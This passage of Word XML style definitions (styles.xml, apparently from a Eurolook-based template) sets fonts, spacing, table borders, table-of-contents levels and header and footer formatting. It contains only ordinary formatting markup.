  <w:style w:type="character" w:customStyle="1" w:styleId="NoteHeadingChar">
    <w:name w:val="Note Heading Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="NoteHeading"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Salutation">
    <w:name w:val="Salutation"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="SalutationChar"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SalutationChar">
    <w:name w:val="Salutation Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Salutation"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="LightList">
    <w:name w:val="Light List"/>
    <w:basedOn w:val="TableNormal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="MS Mincho" w:hAnsi="Calibri" w:cs="Arial"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-GB"/>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ar2">
    <w:name w:val="Calendar 2"/>
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="MS Mincho" w:hAnsi="Calibri" w:cs="Arial"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
    <w:tblPr>
      <w:tblInd w:w="0" w:type="nil"/>
      <w:tblBorders>
        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="95B3D7"/>
      </w:tblBorders>
      <w:tblCellMar>
        <w:left w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:rFonts w:ascii="Bahnschrift SemiCondensed" w:hAnsi="Bahnschrift SemiCondensed"/>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table" w:customStyle="1" w:styleId="DDGreenTable">
    <w:name w:val="DD Green Table"/>
    <w:basedOn w:val="LightGrid-Accent3"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:color w:val="6A6A6A"/>
      <w:sz w:val="18"/>
      <w:lang w:val="en-US" w:eastAsia="en-IE"/>
    </w:rPr>
    <w:tblPr>
      <w:tblInd w:w="864" w:type="dxa"/>
      <w:tblBorders>
        <w:top w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
        <w:left w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
        <w:bottom w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
        <w:right w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
        <w:insideH w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
        <w:insideV w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
      </w:tblBorders>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Bahnschrift SemiCondensed" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift SemiCondensed" w:cs="Times New Roman"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="FFFFFF"/>
        <w:sz w:val="19"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
          <w:left w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
          <w:right w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="59BB24"/>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6A6A6A"/>
          <w:left w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
          <w:right w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>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6A6A6A"/>
          <w:left w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
          <w:right w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
          <w:insideV w:val="single" w:sz="8" w:space="0" w:color="6A6A6A"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="LightGrid-Accent3">
    <w:name w:val="Light Grid Accent 3"/>
    <w:basedOn w:val="TableNormal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:lang w:eastAsia="en-GB"/>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left w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Bahnschrift SemiCondensed" w:eastAsia="Times New Roman"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TableGrid8">
    <w:name w:val="Table Grid 8"/>
    <w:basedOn w:val="TableNormal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:lang w:eastAsia="en-GB"/>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alloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BalloonTextChar">
    <w:name w:val="Balloon Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BalloonText"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Text3Char">
    <w:name w:val="Text 3 Char"/>
    <w:link w:val="Text3"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:locked/>
    <w:rsid w:val="0071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lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTMLPreformattedChar">
    <w:name w:val="HTML Preformatted Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="HTMLPreformatted"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Text2Char">
    <w:name w:val="Text 2 Char"/>
    <w:link w:val="Text2"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet5">
    <w:name w:val="List Bullet 5"/>
    <w:basedOn w:val="Normal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="720"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="720" w:hanging="720"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Quote">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="QuoteChar"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
      <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLVariable">
    <w:name w:val="HTML Variable"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtleEmphasis">
    <w:name w:val="Subtle Emphasis"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLTypewriter">
    <w:name w:val="HTML Typewriter"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="LightList-Accent11">
    <w:name w:val="Light List - Accent 11"/>
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-GB"/>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CellMar>
        <w:left w:w="0" w:type="dxa"/>
        <w:right w:w="0"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Columns3">
    <w:name w:val="Table Columns 3"/>
    <w:basedOn w:val="TableNormal"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:lang w:eastAsia="en-GB"/>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CellMar>
        <w:left w:w="0" w:type="dxa"/>
        <w:right w:w="0"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HTMLAcronym">
    <w:name w:val="HTML Acronym"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Revision">
    <w:name w:val="Revision"/>
    <w:hidden/>
    <w:locked/>
    <w:rsid w:val="00710724"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PlaceholderText">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:semiHidden/>
    <w:rsid w:val="00770C67"/>
    <w:rPr>
      <w:color w:val="288061"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="2"/>
    <w:pPr>
      <w:spacing w:before="120"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Contact">
    <w:name w:val="Contact"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="2"/>
    <w:pPr>
      <w:spacing w:before="480" w:after="240"/>
      <w:ind w:left="567" w:hanging="567"/>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Date">
    <w:name w:val="Date"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="References"/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="5102" w:right="-567"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="EndnoteText">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="357" w:hanging="357"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="FootnoteText">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:ind w:left="357" w:hanging="357"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet">
    <w:name w:val="List Bullet"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="720"/>
      </w:tabs>
      <w:ind w:left="720" w:hanging="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListNumber">
    <w:name w:val="List Number"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="720"/>
      </w:tabs>
      <w:ind w:left="720" w:hanging="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="References">
    <w:name w:val="References"/>
    <w:uiPriority w:val="2"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="num" w:pos="397"/>
        <w:tab w:val="num" w:pos="709"/>
      </w:tabs>
      <w:ind w:left="709" w:hanging="709"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="SubTitle1">
    <w:name w:val="SubTitle 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="360" w:after="2000"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="SubTitle1"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="3200" w:after="480"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:kern w:val="28"/>
      <w:sz w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="595"/>
        <w:tab w:val="right" w:leader="dot" w:pos="8640"/>
      </w:tabs>
      <w:spacing w:before="240" w:after="60" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="595" w:right="720" w:hanging="595"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="595"/>
        <w:tab w:val="right" w:leader="dot" w:pos="8640"/>
      </w:tabs>
      <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="595" w:right="720" w:hanging="595"/>
    </w:pPr>
    <w:rPr>
      <w:noProof/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1446"/>
        <w:tab w:val="left" w:pos="1587"/>
        <w:tab w:val="right" w:leader="dot" w:pos="8640"/>
      </w:tabs>
      <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1445" w:right="720" w:hanging="850"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1446"/>
        <w:tab w:val="left" w:pos="1587"/>
        <w:tab w:val="right" w:leader="dot" w:pos="8640"/>
      </w:tabs>
      <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1445" w:right="720" w:hanging="850"/>
    </w:pPr>
    <w:rPr>
      <w:noProof/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="595"/>
        <w:tab w:val="right" w:leader="dot" w:pos="8640"/>
      </w:tabs>
      <w:spacing w:before="240" w:after="60" w:line="240" w:lineRule="auto"/>
      <w:ind w:right="720"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="595"/>
        <w:tab w:val="right" w:leader="dot" w:pos="8640"/>
      </w:tabs>
      <w:spacing w:before="240" w:after="60" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="1446" w:right="720" w:hanging="1446"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="8640"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="8640"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="8640"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
      <w:b/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="2"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:right="-567"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="2"/>
    <w:rPr>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="2"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4150"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="2"/>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="MacroText">
    <w:name w:val="macro"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="MacroTextChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>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0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="MacroTextChar">
    <w:name w:val="Macro Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="MacroText"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="EurolookClassicBlue">
    <w:name w:val="Eurolook Classic Blu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Grey">
    <w:name w:val="Eurolook Classic Grey"/>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Olive">
    <w:name w:val="Eurolook Classic Oliv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Petrol">
    <w:name w:val="Eurolook Classic Petrol"/>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urple">
    <w:name w:val="Eurolook Classic Purpl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Rust">
    <w:name w:val="Eurolook Classic Rust"/>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LightBlue">
    <w:name w:val="Eurolook Light Blu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
    <w:name w:val="Eurolook Light Grey"/>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
    <w:name w:val="Eurolook Light Oliv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
    <w:name w:val="Eurolook Light Petrol"/>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
    <w:name w:val="Eurolook Light Purpl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
    <w:name w:val="Eurolook Light Rust"/>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Table">
    <w:name w:val="Eurolook Table"/>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StylePr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="PropertiesTable">
    <w:name w:val="Properties Table"/>
    <w:basedOn w:val="TableNormal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:spacing w:after="120" w:line="264" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblInd w:w="1984" w:type="dxa"/>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:semiHidden/>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleCol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History">
    <w:name w:val="Table History"/>
    <w:basedOn w:val="TableNormal"/>
    <w:semiHidden/>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etterhead">
    <w:name w:val="Table Letterhead"/>
    <w:basedOn w:val="TableNormal"/>
    <w:semiHidden/>
    <w:tblPr>
      <w:tblCellMar>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="340" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="0F733057730447D596BBFDBF11EF7A0F">
    <w:name w:val="0F733057730447D596BBFDBF11EF7A0F"/>
    <w:rsid w:val="00831819"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-GB"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="B78E9CB8205742F38AF546E215FFD504">
    <w:name w:val="B78E9CB8205742F38AF546E215FFD504"/>
    <w:rsid w:val="009502B9"/>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8BD33337FF6E458FBD567FF1325DC82F">
    <w:name w:val="8BD33337FF6E458FBD567FF1325DC82F"/>
    <w:rsid w:val="007500C6"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-GB"/>
      <w14:ligatures w14:val="standardContextual"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="BB56302F18754C8AA7690E71CD1C4D90">
    <w:name w:val="BB56302F18754C8AA7690E71CD1C4D90"/>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840203C9FF1F4043A3483346FA2871B0">
    <w:name w:val="840203C9FF1F4043A3483346FA2871B0"/>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DE072181A0894D9B8A95B6EAD01EDF83">
    <w:name w:val="DE072181A0894D9B8A95B6EAD01EDF83"/>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746D911518154AEC8B1C27992CFA98B0">
